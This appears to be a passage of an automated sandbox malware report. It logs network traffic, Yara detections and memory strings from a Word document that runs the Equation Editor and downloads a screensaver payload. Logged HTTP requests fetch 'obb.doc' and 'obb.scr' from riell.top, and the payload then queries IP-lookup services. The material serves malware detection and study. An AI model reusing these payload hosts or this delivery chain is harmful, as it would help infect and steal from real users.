Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166

Networking

Source: Yara match File source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Users\user\AppData\Roaming\obi23456.scr DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\obi23456.scr DNS query: name: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /obb.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: riell.topConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /obb.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: riell.topConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FFDE4C25-701B-4F27-93CB-2693CC173C87}.tmp
Source: global traffic HTTP traffic detected: GET /obb.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: riell.topConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /obb.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: riell.topConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: riell.top
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: obi23456.scr, 0000000A.00000002.897811172.00000000023EA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002497000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: obi23456.scr, 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.898671670.0000000005A20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.898671670.0000000005A20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
